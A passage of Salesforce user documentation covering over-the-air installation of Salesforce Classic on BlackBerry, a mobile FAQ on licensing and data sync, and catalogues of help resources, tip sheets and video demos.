c. On the activation screen, enter your Salesforce username and password.
d. Tap Activate.

Warning:  If the application closes or the device locks during the activation process, the iPhone operating
system pauses the download process but it will resume the next time you open the app.

Depending on your organization's setup, you might need to set up a passcode before accessing the app.

See Also:
Salesforce Classic Implementation Guide
Salesforce Classic User Guide for BlackBerry
Salesforce Classic User Guide for iPhone
Salesforce Mobile Products Overview
Salesforce Classic Overview

Downloading Salesforce Classic Over-the-Air from
Salesforce.com

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

The BlackBerry World is the preferred place for downloading the Salesforce Classic app because users are automatically notified
as upgrades become available. However, some BlackBerry administrators restrict users from downloading and using the
BlackBerry World on their devices. BlackBerry users can install Salesforce Classic over-the-air directly from Salesforce.com
if they are unable to access BlackBerry World.

To download Salesforce Classic over-the-air:

1. Point your mobile browser to mobile.salesforce.com/bb.
2. Highlight the Download the application link and select Get Link from the menu.
3. Select Download. If prompted to replace an older version of the client application, select Yes.
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Note:  The minimum BlackBerry operating system requirement for the mobile application is 4.3. If you're running
versions 4.0–4.3 of the operating system, you can still download and install the mobile application; however, the
mobile server will detect the older operating system and send version 11.6 of the mobile application, which was
the last release that supported operating system versions 4.0–4.3. You can't use any of the new features included
in the current release or future releases until you upgrade to the most recent BlackBerry operating system for your
phone.

4. Select Reboot to restart your device.
5. When prompted to allow an HTTP connection, select the tp.mobile.salesforce.com checkbox. Scroll down and

select Allow this connection.
6. Select the Salesforce Classic icon, which resides on the home page of your device or in the Applications folder. On newer

phones, the icon may be in the Downloads folder.
7. Read the license agreement and select I Accept.
8. Enter your Salesforce username and password.

Because many passwords contain special characters that are difficult to enter on the device, the Show Password checkbox
is selected by default. To protect your password, you can deselect the option.

9. Select Activate.

After your username and password are confirmed by Salesforce, the data downloads. The initial data download may last
a few minutes. Future updates to the data automatically occur behind the scenes.

See Also:
Salesforce Mobile Products Overview
Salesforce Classic Overview

MOBILE FAQ

Using Salesforce Classic FAQ
• Do I need a license to use Salesforce on a mobile device?

• Is my phone compatible with the Salesforce Classic app?

• What Salesforce data is stored on my device when I use the Salesforce Classic app?

• How do I use the Salesforce Classic app to access records that aren't on my mobile device?

• How frequently does the Salesforce Classic app update my data?

• Can I see records in the Salesforce Classic app that I can’t access in Salesforce?

• When I receive a call on my mobile device, will the Salesforce Classic app open the associated contact record?
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Do I need a license to use Salesforce on a mobile device?
You need a mobile license to use the full version of Salesforce Classic. Any Salesforce user who doesn't have a mobile license
can download a free, restricted version of Salesforce Classic.

With the free version, you can view, create, edit, and delete only accounts, assets, contacts, leads, opportunities, events, tasks,
cases, and solutions. You can also access your dashboards.The free version synchronizes records you recently accessed on the
Salesforce website, and you can search for records that were not automatically downloaded to your device. Starting with
Summer ‘13, the free version of Salesforce Classic is disabled by default in all new organizations. You can enable it to give
users access to Salesforce on their mobile devices.

If you’ve been assigned a mobile license but your administrator hasn’t set up your mobile configuration yet, you can activate
Salesforce Classic with the default mobile configuration. The default configuration automatically synchronizes the records
you most recently accessed in Salesforce to your mobile device. You can also search for and download any records from Salesforce
that aren’t available locally on your device.

To find out if your user account has been assigned a mobile license to access the full version of Salesforce Classic, review your
personal setup.

• If the Mobile User checkbox is selected, you can install and run Salesforce Classic. If the Mobile User checkbox is selected
but the Mobile Configuration field is blank, you can activate Salesforce Classic using the default mobile configuration.

• If the Mobile User checkbox isn’t selected and you’re an Enterprise, Professional, Unlimited, or Developer Edition customer,
you may have access to the free version of Salesforce Classic. Ask your administrator whether you have access to the free
version of Salesforce Classic.

Note:  The Mobile User checkbox is disabled by default for new Unlimited Edition users.

Is my phone compatible with the Salesforce Classic app?
The Salesforce Classic app can run on iPhones, iPod touch devices, and most BlackBerry and Android devices. To find out
if your phone can run the app, see the list of supported mobile devices.

Note:  Supported features may vary depending on your mobile operating system and device model.

What Salesforce data is stored on my device when I use
the Salesforce Classic app?

Using the Salesforce Classic app to access Salesforce on a mobile device is much different from using the full Salesforce
application on your computer. Mobile devices have a minimal amount of memory and a small screen, and don’t always maintain
a constant network connection. To work with these limitations, a subset of your Salesforce data is stored in a local database
on your phone.

The following types of tabs are available in the Salesforce Classic app:

• All custom object tabs and these standard object tabs:

◊ Accounts
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◊ Assets
◊ Attachments
◊ Cases
◊ Contacts
◊ Content
◊ Events
◊ Leads
◊ Notes
◊ Opportunities
◊ Price Books
◊ Products
◊ Solutions
◊ Tasks
◊ Users
◊ Dashboards
◊ Reports

• Web and Visualforce tabs

Note:  The tabs and objects that you see in the app are determined by your mobile configuration and might not
include all the tabs and objects listed here.

Additionally, the iPhone and Android apps don’t support reports.

When you open the tab for an object, you probably won't see all of your Salesforce records. For each mobilized object, your
administrator can create filter criteria to limit the number of records on your device. For example, in a large organization,
sending all open and closed opportunities to your mobile device could consume too much memory or potentially crash it.
Instead of sending all opportunities, your administrator might send a subset of them, such as open opportunities that you own
that are scheduled to close this month.

Can I see records in the Salesforce Classic app that I can’t
access in Salesforce?

No. User permissions, sharing rules, and field-level security are inherited from Salesforce—the mobile application enforces
all the restrictions set up in Salesforce.

How frequently does the Salesforce Classic app update my
data?

The Salesforce Classic app checks for data changes every 20 minutes. During this incremental update, the server retrieves any
newly created Salesforce records that you own, and then sends that data to your device. It also sends modifications to any
records already stored on the device.

Note:  Note the following about data synchronization:

• The Android and BlackBerry client apps adjust their data polling time based on app usage. If the app isn’t in use,
the polling time interval increases in an exponential fashion, until it reaches eight hours. From that point forward,
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the device polls for data every eight hours. This prevents the Salesforce Classic app from draining the device
battery when the app is rarely used.

• Because only one app can run on the iPhone at a time, the Salesforce Classic app can’t request a data update unless
the app is open. When you launch the app on the iPhone, it performs an incremental update unless a data
synchronization has occurred in the past 20 minutes.

How do I use the Salesforce Classic app to access records
that aren't on my mobile device?

The Salesforce data available on your device is defined by your mobile configuration. You can easily search for records that
aren't automatically downloaded to your device. A search box is available on each object tab in the Salesforce Classic app, as
well as on the app's home page.

When I receive a call on my mobile device, will the
Salesforce Classic app open the associated contact record?

The Salesforce Classic app can’t open a Salesforce contact when you receive incoming calls. However, if you place a call from
Salesforce Classic, you’re automatically prompted to log the call.

GET HELP AND USER ASSISTANCE

Using Salesforce Help
All information in the online help applies to All Editions, unless otherwise noted.

The Salesforce Help site gives you the information you need to be successful. You can:

• Get Help for What You're Working On

• Find Answers to Your Questions

• Print Help

• Download Tip Sheets and Other Guides

• Review Documentation for Force.com Developers

• Contact Support

Get Help for What You're Working On

On any Salesforce page, click Help for this Page to get context-sensitive help for the page. On any related list or overlay,
click Help to get context-sensitive help.
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Find Answers to Your Questions

To get targeted information, enter keywords or a phrase in the Help search box. You'll get a list of matching resources,
which you can refine by role, language, application area, or document type: help documentation, knowledge articles from
Customer Support, best practices, and training classes. For more information about the Help site's features and content,
start with the How to Use Help gadget on the Help site home page.

Print Help

Click Print this page from any Help page to print a single page. To print the entire user guide, which is a PDF version
of the help documentation, click Printable User Guide in the Documentation gadget or from any Help page. Because
the user guide is thousands of pages, we recommend you print only a single page or a range of pages.

Download Tip Sheets and Other Guides

You can find tip sheets, user guides, and other resources from the Documentation gadget on the Help site home page.

Review Documentation for Force.com Developers

If you are working with the Force.com platform, you'll find the information you need in the Developer Force Technical
Library. You can also access developer documentation from the Documentation gadget on the Help site home page.

Contact Support

Click Contact Support on the Help site to choose your support option: talk by phone, chat, open a case, post a question
to the Salesforce community, or take another action.

Note: Salesforce.com makes every effort to ensure the accuracy of the information contained within the Help site,
but assumes no responsibility or liability for any errors or inaccuracies that may appear. If you do find any errors,
please use the feedback form at the bottom of every help page.

See Also:
Understanding Types of Online Help
Getting Assistance While You Work in Salesforce

Understanding Types of Online Help
Available in: All Editions

Salesforce offers comprehensive online help for all its products and services. Use the help to find out about new and existing
features, and learn how to set them up and use them. The help system offers different types of information, based on your
needs.

• Overview topics, such as “Quotes Overview,” introduce and help you understand Salesforce features, and tools—and
everything you can do with them.

• Concept topics, like “Understanding User License Types,” explain the key ideas and terms you’ll need to know when using
our features and tools.

• Task topics tell you how to perform tasks in Salesforce. Some task topics, such as “Setting Up Case Feed,” walk you through
complex procedures, and others, such as “Editing Records,” through simple and common tasks.
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• Reference topics, such as “Account Fields,” give you the details you need to understand fields and options in the features
you use.

You can find help on all Salesforce pages. Just click Help for this Page to view a topic that explains what you need to know
or do in the feature you’re working in. Click the Help & Training link on any page to open the main Help page and search
for the information you need.

See Also:
Using Salesforce Help
Getting Assistance While You Work in Salesforce

Getting Assistance While You Work in Salesforce
Available in: All Editions

Within Salesforce, you’ll find lots of options for getting assistance while you work. For example, when you first start using
Forecasts, you’ll want to watch the guided tour, which demonstrates the key parts of the Forecasts user interface. As you gain
experience and use features like forecast adjustments, you’ll find information bubbles to help you understand what to do.

It’s a good idea to be on the lookout for the user assistance options we’ve built in to Salesforce. Here are some of the most
common user assistance features you'll find.

What to Look ForHow to Use ItType of Assistance

Guided tours pop up and introduce themselves,
then walk you through the parts of a feature’s user
interface. If you dismiss a tour without viewing it,
look for the Guided Tour link, then click it when
you’re ready.

Guided Tour

You’ll find helpful videos embedded throughout
Salesforce. Some videos pop up automatically to
introduce a new feature or tool, or show you how

Video

to perform a task. Some videos become available
when you enable a feature. Most videos are linked
from the Salesforce pages for their features, so you
can view them multiple times. You can also find
videos linked within the Salesforce help and release
notes.

Info bubbles provide essential information about

fields and options. Just hover over the  icon to
view.

Info Bubble
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What to Look ForHow to Use ItType of Assistance

Click tips provide examples, suggestions, and links
to more information about the feature you’re using.
Click the  icon to view.

Click Tip

See Also:
Understanding Types of Online Help

Learning About Salesforce Features
In addition to documentation about setting up Salesforce and adding yourself as a user, Salesforce also provides comprehensive
documentation for administering and using all its products and features, and extending the Salesforce service with our
development tools.

You can find our documentation in both online help and PDF formats. Here’s a summary of what you’ll find in each set.

DescriptionWho should read it?Documentation Set / PDF Title

Designed for end users and
administrators, this documentation tells

Users and AdministratorsLearn Salesforce Basics

how to set yourself up as a Salesforce
user. It also explains common terms and
concepts, and tells you how to perform
common tasks, such as navigating and
searching the product. You’ll also find
basic information about Chatter,
analytics, Salesforce Mobile, and more.
Detailed information about these
products and features can be found in the
other documentation sets described here.

Designed for administrators, (users
assigned to the Administrator profile),

AdministratorsSet Up and Maintain Your Salesforce
Organization

this documentation tells how to set up
your online Salesforce organization and
configure it for your company’s needs. It
also guides you through ongoing
maintenance.

Designed for administrators, this
documentation tells how to set up and

AdministratorsSet up and Maintain Sales Tools

configure CRM features, so your users
can become successful selling to their
customers using Salesforce. This
documentation does not include
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DescriptionWho should read it?Documentation Set / PDF Title

feature-specific concepts. For those, you
can refer to Sell to Your Customers

Designed for users, this documentation
provides the concepts, tasks, and general

Users and AdministratorsSell to Your Customers

guidance you need to use Salesforce to
sell more successfully to your customers.

Designed for administrators, this
documentation tells how to set up

AdministratorsSet Up and Maintain Customer Support
Tools

Salesforce customer service and support
features (also known as the Service
Cloud).. This documentation does not
include feature-specific concepts or
overviews. For those, please refer to the
user documentation, Support Your
Customers.

Designed for support agents and others
who want to use Salesforce customer

Users and AdministratorsSupport Your Customers

service and support features (also known
as the Service Cloud) this documentation
gives you the concepts, tasks, and general
guidance you need to useSalesforce to
provide customer service.

Designed for both users and
administrators, this documentation tells

Users and AdministratorsAnalyze Your Salesforce Data

how to create, run, share, and maintain
Salesforce reports and dashboards.

Designed for administrators, this
documentation contains everything you

AdministratorsSet up and Maintain Collaboration Tools

need to help your users collaborate with
each other, or even with people outside
your organization. Learn how to set up
and extend Chatter, or enable users to
create, package and send files outside
your organization using Salesforce CRM
Content. For information on using
collaboration tools, see the user
documentation Collaborate with everyone

Designed for both users and
administrators, this documentation tells

Users and AdministratorsCollaborate with Everyone

how to complete tasks quickly and
efficiently by collaborating with people
either inside or outside of your Salesforce
organization.

Refer to this documentation for
information on collaboration tools like
Chatter, Salesforce CRM Content, and
even documents.
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DescriptionWho should read it?Documentation Set / PDF Title

Designed for administrators and
developers, this documentation takes you

Administrators and DevelopersEnhance Salesforce with Point and Click
Tools

beyond the basics of Salesforce
administration and tells how to enhance
your objects, data, and fields, customize
your organization’s look and feel,
augment your business processes, create
websites, and even create apps—all using
point-and-click tools.

Designed for developers, this
documentation tells you how to enhance

DevelopersEnhance Salesforce with Code

your Salesforce organization by
developing custom applications and
integrating external applications.

Designed for developers, this
documentation tells you how to create,

DevelopersPackage and Distribute Your Apps

package, and distribute apps you build
using the Force.com platform, and how
to support your app’s subscribers.

This reference documentation identifies
limits that may affect your setup,

Users, Administrators, and DevelopersSalesforce Limits

maintenance, and use of Salesforce, as
well as how you expand it with
point-and-click tools or code.

Designed for users, administrators, and
developers, this documentation defines

Users, Administrators, and DevelopersSalesforce Glossary

names, concepts, and terms that appear
throughout the Salesforce user interface
and documentation.

Printable Tip Sheets & User Guides
In addition to online help, salesforce.com publishes printable documentation to help you be successful with Salesforce. These
documents include tip sheets, user guides, and other resources that describe the features and capabilities of Salesforce. These
documents are available as Adobe® PDF files. Adobe Reader® is required to open PDF files; to download the latest version
of Reader, go to www.adobe.com/products/acrobat/readstep2.html.

This topic lists the PDF files that are available for the following audiences.

• For All Users

• For Sales Professionals

• For Support Professionals

• For Marketing Professionals
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• For Administrators

See Also:
Video Demos

For All Users
These documents are for all Salesforce users.

• How to be Successful with Salesforce

• Find the Information You Need

• Tips & Hints for Custom Views

• Browser Support and Configuration

• Salesforce System Requirements

• Using Ideas

• Tips for Using Content Deliveries

• Using Salesforce Group Edition

• Chatter Plus Frequently Asked Questions

Reports and Dashboards

• Getting Started with Analytics
• Analytics Workbook
• Using the Reports Tab
• Using the Drag-and-Drop Report Builder
• Maximizing Report Performance
• Report Formula Summary Functions
• FAQ: Scheduling Reports
• Tips for Creating Dashboards
• One Dashboard For Many Viewers
• Taking Advantage of Dynamic Dashboards
• Sample CRM Dashboards
• What are Joined Reports?
• Using Cross Filters in Reports
• Using Bucket Fields

For Sales Professionals
The following documents apply to sales professionals:

Account Management

• Getting Microsoft® Outlook® and Salesforce in Sync
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http://na1.salesforce.com/help/doc/en/salesforce_technical_requirements.pdf
http://na1.salesforce.com/help/doc/en/salesforce_ideas_cheatsheet.pdf
http://na1.salesforce.com/help/doc/en/salesforce_content_delivery_cheatsheet.pdf
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http://na1.salesforce.com/help/doc/en/salesforce_analytics_overview_cheatsheet.pdf
http://www.salesforce.com/us/developer/docs/workbook_analytics/workbook_analytics.pdf
http://na1.salesforce.com/help/doc/en/salesforce_reports_enhanced_reports_tab_tipsheet.pdf
http://na1.salesforce.com/help/doc/en/salesforce_report_builder_impl_guide.pdf
http://na1.salesforce.com/help/doc/en/salesforce_reportperformance_cheatsheet.pdf
http://na1.salesforce.com/help/doc/en/salesforce_report_summary_functions_cheatsheet.pdf
http://na1.salesforce.com/help/doc/en/salesforce_reports_schedule_cheatsheet.pdf
http://na1.salesforce.com/help/doc/en/salesforce_dashboards_cheatsheet.pdf
http://na1.salesforce.com/help/doc/en/salesforce_dashboard_filters_cheatsheet.pdf
http://na1.salesforce.com/help/doc/en/salesforce_dynamic_dashboards_cheatsheet.pdf
http://na1.salesforce.com/help/doc/en/salesforce_dashboard_samples.pdf
http://na1.salesforce.com/help/doc/en/salesforce_report_joined_format_cheatsheet.pdf
http://na1.salesforce.com/help/doc/en/salesforce_report_cross_filters_cheatsheet.pdf
http://na1.salesforce.com/help/doc/en/salesforce_reports_bucketing_cheatsheet.pdf
http://na1.salesforce.com/help/doc/en/sfo_getting_started_guide.pdf


• Tips & Hints for Sales Reps
• Importing Your Personal Accounts and Contacts
• Implementing Data.com Clean
• Tips for Using Content Deliveries
• Tips for Using HTML Email Templates
• Working with Connect for Outlook
• Working with Connect for Lotus Notes
• Using Force.com Connect for Office
• Salesforce Bulk Mail Merge Process
• Guidelines for Uploading Mail Merge Templates
• Sample Mail Merge Templates (Zip file)
• Getting Started with Force.com Connect Offline
• Tips & Hints for Working with Territories
• Tips & Hints for Person Accounts

Pipeline Management

• Forecasts Administrator’s Workbook—For administrators of Collaborative Forecasts.
• Using Customizable Forecasts—For users of Customizable Forecasting. For more information, search for “Customizable

Forecasting Overview” in the Salesforce online help.
• Forecasts: Assessing Your Position—For users of Forecasts (Classic). For more information, search for “Do I have Customizable

Forecasting?” in the Salesforce online help.
• Tips & Hints for Products & Schedules

Mobile

• Getting Started with Chatter Mobile
• Salesforce Classic Implementation Guide
• Salesforce Classic for BlackBerry
• Salesforce Classic User Guide for BlackBerry
• Salesforce Classic User Guide for iPhone
• Salesforce Classic for Windows Mobile
• Salesforce Classic User Guide for Windows Mobile
• Windows Mobile Peripherals Implementation Guide

For Support Professionals
These documents are for support professionals.

• Tips & Hints for Support Reps

• Getting Started with your SoftPhone

• Using the Console Tab

• Tips & Hints for Solutions

• Getting to Know Case Feed

• Getting to Know Live Agent
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For Marketing Professionals
The following documents apply to marketing professionals:

• Getting the Most from Your Leads

• Five Steps for Managing Campaigns

• Tips for Using Content Deliveries

• Using Data.com Clean in Salesforce

For Administrators
The following documents apply to administrators:

Sales Administration

• Setting Up Shared Calendaring
• Deploying Territory Management
• Implementing Person Accounts
• Forecasts Administrator’s Workbook—For Collaborative Forecasts
• Setting Up Customizable Forecasting
• Customizable Forecasting FAQ
• Salesforce Classic Implementation Guide
• Salesforce CRM Content Implementation Guide
• Administering Salesforce Desktop Clients
• Administering Connect for Outlook
• Administering Connect for Lotus Notes
• Accessing SharePoint Data with Sunlight Search — Beta
• Getting Started with Relationship Groups
• Getting Started with Assets
• Getting Started with Contracts

Support Administration

• Setting Up Customer Support
• Case Management Implementation Guide
• Solutions Implementation Guide
• Getting Started with Setting Up Call Centers
• Getting the Most from Your Self-Service and Customer Portals
• Salesforce Customer Portal Implementation Guide
• Chatter Answers Implementation Guide
• Service Cloud Console Implementation Guide
• Self-Service Portal Implementation Guide
• Salesforce CRM Content Implementation Guide
• Salesforce Knowledge Implementation Guide
• Setting up Salesforce Knowledge
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http://na1.salesforce.com/help/doc/en/salesforce_customer_portal_implementation_guide.pdf
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• Importing Articles intoSalesforce Knowledge
• Answers Implementation Guide
• Entitlement Management Implementation Guide
• Live Agent Implementation Guide
• Setting Up Case Feed
• Getting Started with the Ideas Base Theme

Marketing Administration

• Tips for Lead Administrators
• Salesforce Lead Management Implementation Guide
• Campaign Management Implementation Guide
• Salesforce Ideas Implementation Guide

Collaboration Administration

• Getting Started With Salesforce Communities
• Migrating From Portals to Communities

Salesforce Implementations

• Salesforce Enterprise Edition Upgrade Guide
• Setting Up SalesforceGroup Edition
• Salesforce Limits Quick Reference Guide

Customization

• Tips & Hints for Record Types
• Building Salesforce Custom Links
• Tips & Hints for Page Layouts and Field-Level Security
• Building Custom Objects, Tabs, and Related Lists
• Implementing State and Country Picklists (Beta)
• Formulas Quick Reference Guide
• Useful Formula Fields
• Tips for Reducing Formula Size
• Useful Validation Rules
• Using Multiple Business Processes
• Workflow: Automating The Process
• Useful Workflow Rules
• Getting Started with Approval Processes
• Useful Approval Processes
• Email Approval Response
• Visual Workflow Implementation Guide
• Creating Lookup Filters on Relationship Fields (Beta)

Security and Data Management

• Security Implementation Guide
• Single Sign-On Implementation Guide
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http://na1.salesforce.com/help/doc/en/salesforce_web_integration_links.pdf
http://na1.salesforce.com/help/doc/en/salesforce_pagelayouts_cheatsheet.pdf
http://na1.salesforce.com/help/doc/en/salesforce_studio_cheatsheet.pdf
http://na1.salesforce.com/help/doc/en/state_country_picklists_impl_guide.pdf
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• Tips & Hints for Sharing Data
• Understanding Defer Sharing Calculations
• Managing Data Quality
• Implementing Data.com Clean for Accounts, Contacts, and Leads
• Importing Your Organization’s Accounts and Contacts
• Using Mass Delete to Undo Imports
• Getting Started with Divisions
• Data Loader Guide
• Salesforce Field Reference Guide
• Resolving Data Conflicts and Errors in Force.com Flex Apps

Extending Salesforce

• Developing Packages for Distribution
• AppExchange Publishing Guide
• Application Installation Guide
• Force.com Sites Implementation Guide
• OEM User License Comparison

Globalization

• Setting Up the Translation Workbench
• International Organizations: Using Multiple Currencies

Video Demos
In addition to online help, salesforce.com creates video demos to help you be successful with Salesforce.

• Chatter

• Sales

• Service

• Analytics

• Data.com

• Force.com

• Site.com

• Security

• Data Import

Chatter

For
Administrators

For End UsersVideo Title

Setting Up Your Salesforce Community (5:59 minutes)
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http://www.salesforce.com/_app/video/chatter/help/Salesforce_Communities_Setup_video.jsp


For
Administrators

For End UsersVideo Title

Learn about basic setup of Salesforce Communities, including creating a community,
adding members and tabs, customizing the interface and emails, and previewing
and publishing.

Discover and Organize with Chatter Topics (3:41 minutes)

Use Chatter topics to see what people are talking about, organize the conversations
you want to be a part of, and discover people and groups that are interested and
knowledgeable in the same areas.

Enhancing Your Chatter Posts (1:10 minutes)

Learn how to use @mentions and #topics to enhance your Chatter posts.

Sending Private Chatter Messages (3:15 minutes)

Learn how to communicate privately in Chatter using messages.

Sharing Files in Chatter (2:45 minutes)

Sharing files has never been easier. Learn how to upload and share files at one time,
share files with a Chatter message, perform actions from file hovers, and share files
with anyone inside or outside of your company by sending them a secure link.

Using Chatter Groups (2:16 minutes)

With Chatter Groups you can invite people outside your company to safely
collaborate with you and your group members. Consultants, partners, board
members... now you can select anyone to join you on Chatter!

Using Smart Search (2:12 minutes)

Watch this short video to see how you can find what you need quickly and easily,
in Salesforce Chatter, using smart search.

Getting the Most Out of Chatter Feeds (2:32 minutes)

Use Salesforce Chatter to create posts, polls, and bookmarks to collaborate effectively
with your coworkers in Chatter. You learn how to post to your followers or a group,
bookmark a post so you can find it later, and how to create a poll on the fly so you
can gather results fast!

Using Chatter in Apex to Display Two Chatter Feeds in a Visualforce Page
(6:00 minutes)

Learn how easy it is to use Chatter in Apex to get Chatter feeds for your Salesforce
Communities and display them side by side in Salesforce. Use the Developer
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For
Administrators

For End UsersVideo Title

Console to create an Apex custom controller, a Visualforce custom component,
and a Visualforce page.

Sales

For
Administrators

For End UsersVideo Title

Splitting Credit across Your Sales Team (1:44 minutes)

Learn how to add revenue and overlay splits to opportunities.

Change Sets Overview (2:30 minutes)

Use change sets to easily move configuration settings from one organization to
another.

Creating a Criteria-Based Sharing Rule (1:13 minutes)

Learn how to create a sharing rule based on a field value in a record.

Editing Role-Based Category Group Visibility (2:00 minutes)

Allows certain roles to view information, such as questions in an answers community
or articles in a knowledge base, according to specific data categories.

Forecast Accurately With Collaborative Forecasts (4:48 minutes)

See how to maneuver around Collaborative Forecasts so that you can reach your
sales goals.

Importing Accounts Using the Data Loader Command Line Interface (5:20
minutes)

Learn how to use the Data Loader CLI to import data into Salesforce.

Requesting a Meeting Using Cloud Scheduler (2:37 minutes)

Learn how to use Cloud Scheduler to request and schedule meetings with your
customers and coworkers.

Sending Mass Email (4:31 minutes)

This demo shows you how to leverage the mass email tool in Salesforce, so you can
quickly contact your customers and keep track of these emails within the Salesforce
app.
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For
Administrators

For End UsersVideo Title

Setting Up Data Categories (1:30 minutes)

Data categories let you classify your data based on your business needs.

Using Quote Templates (2 minutes)

Quote templates let you design, preview, and activate templates for the quote PDFs
you send to your customers.

Entitlements Management Setup (2:46 minutes)

Learn how to set up the Entitlement Management feature. Entitlement
Management helps your support reps determine which customers are eligible for
certain kinds of support. This video covers Entitlement Management Milestones,
Entitlement Processes, Entitlements, and Service Contracts.

Salesforce for Outlook Videos

Getting Ready to Integrate Microsoft® Outlook® and Salesforce (3:00 minutes)

If you want to sync contacts, events, and tasks between Microsoft® Outlook® and
Salesforce, as well as add emails to Salesforce records, you’ll use
Salesforce for Outlook. Learn how to download and install it.

Learning about Sync Directions (2:16 minutes)

Learn how to view your sync direction settings in Salesforce for Outlook, and find
out whether you have permissions to change them.

Using Salesforce for Outlook (2:43 minutes)

Learn how to easily sync contacts, events, and tasks with Salesforce and add emails
to related Salesforce records.

Using the Salesforce Side Panel to Work with Records in Microsoft® Outlook®

(2:18 minutes)

Learn how you can work with Salesforce records directly in Outlook. In addition,
learn about adding Outlook emails to the Salesforce records of your choice.

How to Merge Contacts in Salesforce (1:48 minutes)

Learn how you can merge duplicate contact records in Salesforce.
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http://www.salesforce.com/_app/video/Sales_Cloud_General/help/How_to_Merge_Duplicate_Contacts_video.jsp


Service

For
Administrators

For End UsersVideo Title

Encourage Collaboration with Idea Themes (3:30 minutes)

Idea Themes lets you invite community members to post ideas about specific topics
so that members can solve problems or propose innovations for your company.

Introducing the Service Cloud Console (2:00 minutes)

The Service Cloud console uses tabs to help you find and update records quickly.

Setting Up a Service Cloud Console (2:20 minutes)

How to set up a Service Cloud console for support agents.

Supporting Multiple Languages with Salesforce Knowledge (3:39 minutes)

Learn how to translate knowledge base articles with Salesforce Knowledge.

Analytics

For
Administrators

For End UsersVideo Title

Building Matrix Reports (2:00 minutes)

This video shows you how easy it is to create matrix reports using report builder.

Using Cross Filters in Reports (2:40)

Use a cross filter to find just the records you need in a report. Cross filters let you
fine-tune your results by including or excluding records from related objects, without
having to write formulas or code.

Getting Started with Buckets (3:00 minutes)

Learn how to group your data without having to create custom fields! Buckets help
you sort, organize, and understand large amounts of data in Salesforce quickly and
easily. Create your own categories on the fly, without formulas or custom fields.

Getting Started with Report Builder (2:34 minutes)

This video introduces you to the report builder, a powerful drag-and-drop interface
for building reports.
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For
Administrators

For End UsersVideo Title

Introducing Joined Reports in Salesforce (3:19 minutes)

With joined reports, you create different types of information in a single report.
Our example creates open and closed opportunities and active support cases.

An Overview of Dashboards (3:20 minutes)

This demo covers some key dashboard features, such as changing the visual display,
changing drill down options, and creating dynamic dashboards, so sales managers
and team members can use one dashboard to track their team's or individual
performance.

Tips for Scheduling Reports (2:19 minutes)

Learn how to schedule reports with an active running user, send them during
off-peak hours without impacting performance, and email them to the right users.

Making Your Reports Run Faster (3:14 minutes)

Get tips to make your reports run faster. Learn how to remove unnecessary columns,
set the scope for relevant data, and use efficient filters with operators.

Data.com

For
Administrators

For End UsersVideo Title

Finding Data.com Accounts and Contacts and Adding Them to Salesforce
(3:37 minutes)

Learn how to find Data.com accounts and contacts and add them to Salesforce.
Check out the Account Card.

How Do I Set Up Data.com Clean? (4:35 minutes)

This video shows Salesforce administrators how to set up and maintain Data.com
Clean. It covers the clean features available with the Data.com Corporate and
Premium products, plus the additional features available with the Data.com Clean
product.

Select a Data.com Match for your Salesforce Account Record (0:47 minutes)

Using the Data.com Industry Selector (2:56 minutes)
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http://www.salesforce.com/_app/video/reports/help/joined_reports.jsp
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Administrators

For End UsersVideo Title

Learn how to use the Data.com Industry Selector to navigate easily through
extensive industry lists and add industry criteria to your search for accounts or
contacts.

Force.com

For
Administrators

For End UsersVideo Title

Creating a Workflow Rule (2:50 minutes)

Quick demo of how to create a workflow rule in Salesforce.

Visual Workflow Cloud Flow Designer Overview (2:27 minutes)

This demo gives you an overview of Visual Workflow's Cloud Flow Designer, the
tool for creating flows. With the Salesforce Cloud Flow Designer, you can configure
screens and define branching logic for your flows, completely within Salesforce,
without writing any code.

Building a Simple Flow (3:30 minutes)

Follow along as we create a simple two-screen pledge flow using user input fields
and choices. We'll collect users' information, ask them to choose a pledge level,
then thank them for their donation.

Importing Accounts Using the Data Loader Command Line Interface (5:20
minutes)

Learn how to use the Data Loader CLI to import data into Salesforce.

Using the Developer Console (4:35 minutes)

Learn how to use the Developer Console to open and navigate through Apex classes,
execute code, test code performance, and inspect objects in memory.

Site.com

For
Administrators

For End UsersVideo Title

Building a Website with Site.com (3:02 minutes)

Learn how to import assets to use in your site, create page templates, apply CSS
styles, and add and duplicate site pages using Site.com Studio.
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Administrators

For End UsersVideo Title

Editing and Managing Content with Site.com (2:53 minutes)

Learn how to update the content of your website, import files, edit and format text,
and add images and links using Site.com Studio.

Security

For
Administrators

For End UsersVideo Title

Who Sees What: Overview (4:33 minutes)

Learn how you can control who sees what data in your organization.

Who Sees What: Organization Access (4:25 minutes)

Learn how to restrict login through IP ranges and login hours.

Who Sees What: Object Access (5:51 minutes)

Learn how you can grant users access to objects by using profiles.

Who Sees What: Organization-Wide Defaults (6:36 minutes)

Learn how you can restrict access to records owned by other users.

Who Sees What: Record Access via the Role Hierarchy (7:29 minutes)

Learn how you can open up access to records using the role hierarchy.

Who Sees What: Record Access via Sharing Rules (4:27 minutes)

Learn how you can grant access to records using sharing rules.

Who Sees What: Field-level Security (3:58 minutes)

Learn how you can restrict access to specific fields on a profile by profile basis.

Letting Your Salesforce Administrator Access Your Account (1:41 minutes)

Learn how you can grant your administrator access to your Salesforce account
without distributing your password.

Removing Users’ Access to Salesforce (3:45 minutes)
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Administrators

For End UsersVideo Title

Deactivating users in Salesforce removes access to their account data while preserving
their historical activity and records. Once you understand why you deactivate users
rather than deleting them, learn how to deactivate someone and see what happens
to their data.

Activating Your Computer (1:29 minutes)

Learn how to activate your computer so you can log in to Salesforce outside the
office.

Data Import

For
Administrators

For End UsersVideo Title

Data Import Overview (1:38 minutes)

If you’re importing data into Salesforce, the Data Import video series is a must-see.
This overview video gives a quick glimpse of what each video covers, and lets you
use the clickable list of titles to access the videos you’re interested in.

Preparing Your Data for Import (4:54 minutes)

Learn how to clean up your import files and get Salesforce ready, as well as best
practices for keeping data clean once it’s been imported.

Cleaning and Preparing Your Data Using Excel (11:27 minutes)

Excel offers many features and functions to make quick work of getting your data
files ready for import. We’ll show you some practical ways to use these features
with your import data.

Should I Use Data Loader (6:34 minutes)

Learn Data Loader in depth, so you can decide whether it’s right for your needs.
We compare it to the Import Wizards and also list some other tools you might
consider.

Importing Your Data in the Right Order (7:49 minutes)

Learn, step by step, which objects should be imported, and when.
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For End UsersVideo Title

Best Practices for Importing Data (2:47 minutes)

Learn the top pain points experienced by our customers, so you can avoid them
entirely! This video could save you hours of frustration. We detail how to delete a
bad import, how to back up data before import, and more.

See Also:
Printable Tip Sheets & User Guides

How can I sign up for training?
